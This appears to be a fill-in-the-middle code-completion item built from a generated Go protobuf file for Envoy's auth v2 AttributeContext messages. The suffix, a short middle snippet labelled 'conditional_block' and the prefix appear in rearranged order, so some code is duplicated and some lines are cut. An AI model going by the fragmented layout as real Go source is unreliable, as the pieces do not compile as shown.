}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil |
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
}
| {
return m.Query
} | conditional_block |
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) | () *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identify of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil {
return m.Query
}
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
